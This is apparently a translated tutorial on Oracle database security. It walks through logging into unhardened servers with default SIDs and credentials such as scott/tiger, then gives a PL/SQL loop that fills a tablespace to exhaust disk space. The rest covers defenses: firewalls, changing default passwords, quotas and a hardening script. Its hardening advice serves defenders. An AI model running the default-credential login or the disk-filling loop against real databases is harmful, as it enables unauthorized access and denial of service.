People often hear about Windows security vulnerabilities and frequent virus attacks, and the traditional view is that Windows is simply too unsafe. In fact, a badly configured Unix/Linux system is far more dangerous than most people imagine. Most people pay great attention to the security of the operating system, but what about the database, the most important application running on it? This article looks at security at the database level; of course, if the operating system itself is compromised, all bets are off. Let me walk you through attacking a machine running Oracle.
1. First, determine the IP address of the Oracle host to attack (if there is no particular target, scan the whole network for hosts with port 1521 open; don't tell me you can't even manage a scan...).
2. Guess its SID. This seems hard, but in practice most Oracle installations keep the default value; 80% of people never change it, or it is easy to guess, for example: Orcl, ORA, ORA8, ORA9, Oracle, Oracle8, Oracle9, Oracle8i, Oracle817, Oracle92 ...
3. After connecting, guess the username and password. This also seems hard, but SYS, SYSTEM and the other system users have default passwords. Admittedly, 9i finally changed this so that the passwords are defined by the user at install time (but most people either keep the old passwords or use 'oracle'), and forgotten accounts such as SCOTT are still created by the default installation.
4. sqlplus scott/tiger@ORA_SID finally logs in. But this little user is only meant for testing and learning; what can we do with it?
Type:
SQL> SELECT username, default_tablespace FROM user_users;

USERNAME                       DEFAULT_TABLESPACE
------------------------------ ------------------------------
SCOTT                          USERS

SQL> SELECT * FROM session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION
ALTER SESSION
UNLIMITED TABLESPACE
CREATE TABLE
CREATE CLUSTER
CREATE SYNONYM
CREATE VIEW
CREATE SEQUENCE
CREATE DATABASE LINK
CREATE PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE

SQL> SELECT * FROM user_ts_quotas;

TABLESPACE_NAME      BYTES  MAX_BYTES     BLOCKS MAX_BLOCKS
--------------- ---------- ---------- ---------- ----------
SYSTEM              524288          0         64          0
USERS                65536          0          8          0
What does that mean?
It means that this user's data is created by default in the USERS tablespace, that it holds privileges such as CREATE TABLE, and that its use of disk in the USERS tablespace is unlimited. Attentive readers will already see that we can write a large amount of data here, until the disk fills up and the database can no longer be used ... Let's try it.
SQL> CREATE TABLE test (a CHAR(30));
This TEST table has only one column, A.
Now write a PL/SQL block:
    DECLARE
      v_number VARCHAR2(30);
      -- m_number is the number of rows to insert; it can be changed but must not exceed 30 digits
      m_number VARCHAR2(30) := 999999999999999999999999999999;
    BEGIN
      FOR v_number IN 1..m_number LOOP
        INSERT INTO test (a) VALUES (m_number);
        COMMIT;
      END LOOP;
    END;
    /
The PL/SQL block above loops, inserting the 30-digit value '999999999999999999999999999999' into column A of the TEST table. At 30 bytes per row, the total comes to more than 20 million; even an IBM Shark disk array could not hold it. Of course, you can also add a few more columns, reduce the m_number value, and speed things up.
Here I should remind everyone about the Oracle default user DBSNMP: almost every typical installation of a slightly newer version creates it, and its danger index is higher than SCOTT's, because it is created in the SYSTEM tablespace ...
Before long the DBA will be scrambling to find out what is wrong with his own system. Generally speaking, the success rate of this attack is quite high. Now let's talk about how to defend:
1. Enable a firewall. Many organizations' databases have no firewall protection at all, or the firewall is configured to be transparent. A firewall effectively blocks scanning; if you use NAT and address restrictions, and preferably also block ICMP, nobody on the outside network can even see your database.
2. Build multi-tier database applications. Traditional client/server has many advantages, but its security is genuinely worrying. Many developers write the database username and password directly into the client program and assume it is safe once compiled, but have you ever opened that client program in a text editor? You will find the username and password right there. A multi-tier architecture has no such problem: the front end is a browser or a thin client, which may cost some efficiency but is definitely the first choice when the service has to be provided across the whole network.
3. Remove the Oracle components you do not need, such as JServer, the Agent, remote management, and so on.
4. Change the passwords of the default users, and enforce password management and complexity for the users you create yourself.
Log in as SYSTEM and run:
SQL> SELECT username FROM dba_users;

USERNAME
------------------------------
SYS
SYSTEM
OUTLN
DBSNMP
TEST
SCOTT
RMAN
TEST1

SQL> SELECT * FROM session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION
ALTER SESSION
CREATE TABLE
CREATE CLUSTER
CREATE SYNONYM
CREATE VIEW
CREATE SEQUENCE
CREATE DATABASE LINK
SELECT ANY DICTIONARY
Check which users exist on your system, whether their passwords have been changed and are complex enough, and whether their privileges look suspicious.
5. Make data backups
Not much more to say here; the relevant section of 9CBS has detailed posts describing Oracle's backup mechanisms.
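As an added example written for this article (it is not the author's code), here are the SQL*Plus statements a DBA would run as SYS to carry out step 4, and to close the hole the SCOTT attack relied on: the UNLIMITED TABLESPACE privilege combined with a default tablespace on the same disk as everything else. The account names come from the DBA_USERS listing above; the profile name APP_PROFILE, the 10M quota and the password placeholder are my assumptions.

```sql
-- Run as SYS (or another DBA) in SQL*Plus. Account names are those from the
-- DBA_USERS listing in this article; APP_PROFILE and the quota size are assumptions.

-- What is actually there: status, default tablespace and profile of every account.
SELECT username, account_status, default_tablespace, profile
  FROM dba_users
 ORDER BY username;

-- Who can fill any tablespace: UNLIMITED TABLESPACE bypasses every quota, which is
-- exactly what let SCOTT flood the USERS tablespace. (Before 12c the RESOURCE role
-- also granted it, so check role grants too.)
SELECT grantee
  FROM dba_sys_privs
 WHERE privilege = 'UNLIMITED TABLESPACE';

-- Demonstration accounts production has no use for: lock them and expire the
-- well-known passwords. Keep DBSNMP open only if the Agent is really in use.
ALTER USER scott  ACCOUNT LOCK PASSWORD EXPIRE;
ALTER USER dbsnmp ACCOUNT LOCK PASSWORD EXPIRE;

-- Accounts that stay: replace the install-time passwords.
-- <NewComplexPassword> is a placeholder, not a suggested value.
ALTER USER sys    IDENTIFIED BY "<NewComplexPassword>";
ALTER USER system IDENTIFIED BY "<NewComplexPassword>";

-- Application accounts get a hard ceiling instead of the blanket privilege:
-- no space at all in SYSTEM, a fixed quota in their own tablespace.
-- (REVOKE raises ORA-01952 if the account never held the privilege; harmless.)
REVOKE UNLIMITED TABLESPACE FROM test1;
ALTER USER test1 QUOTA 0   ON system;
ALTER USER test1 QUOTA 10M ON users;

-- Complexity and lockout for self-created users. VERIFY_FUNCTION is created by
-- $ORACLE_HOME/rdbms/admin/utlpwdmg.sql; its name differs between releases.
CREATE PROFILE app_profile LIMIT
  FAILED_LOGIN_ATTEMPTS    5
  PASSWORD_LOCK_TIME       1
  PASSWORD_LIFE_TIME       90
  PASSWORD_REUSE_MAX       5
  PASSWORD_REUSE_TIME      365
  PASSWORD_VERIFY_FUNCTION verify_function;
ALTER USER test1 PROFILE app_profile;

-- Verify: MAX_BYTES of -1 means an unlimited quota; nothing but DBA-type
-- accounts should still show it, and no application account should have
-- any quota on SYSTEM.
SELECT username, tablespace_name, bytes, max_bytes
  FROM dba_ts_quotas
 ORDER BY username, tablespace_name;
```

Re-run the first two queries after the changes; any account that still holds UNLIMITED TABLESPACE can repeat the disk-filling loop regardless of its quotas.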
6. Partition the file system sensibly
* Under Unix/Linux, check your file systems with df -k. Different users should use different tablespaces, different tablespaces should be created on different file systems, applications should not be built in the SYSTEM tablespace, and the management of rollback/redo space must not be neglected.
SQL> host df -k
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/hda2              5036316   2100832   2679652  44% /
/dev/hda3              5036316   4381292    399192  92% /oracle
none                    256144         0    256144   0% /dev/shm
/dev/hda5              2016016    863144   1050460  46% /data1
/dev/hda7              6166948    558176   5295508  10% /data2
/dev/cdrom               81762     81762         0 100% /mnt/cdrom
SQL> SELECT file_name, tablespace_name FROM dba_data_files;

FILE_NAME                                    TABLESPACE_NAME
-------------------------------------------- ---------------
/oracle/product/9.2.01/oradata/system.dbf    SYSTEM
/oracle/product/9.2.01/oradata/undotbs.dbf   UNDOTBS
/data1/oradata/data1.dbf                     DATA1
/data2/oradata/data2.dbf                     DATA2
* Under Windows, use Explorer to check your partitions. Different tablespaces should be created on different partitions; don't put the SYSTEM tablespace and your application on the same one.
Of course, security management is a boundless sea; this article is only a brick thrown out in the hope of attracting jade ...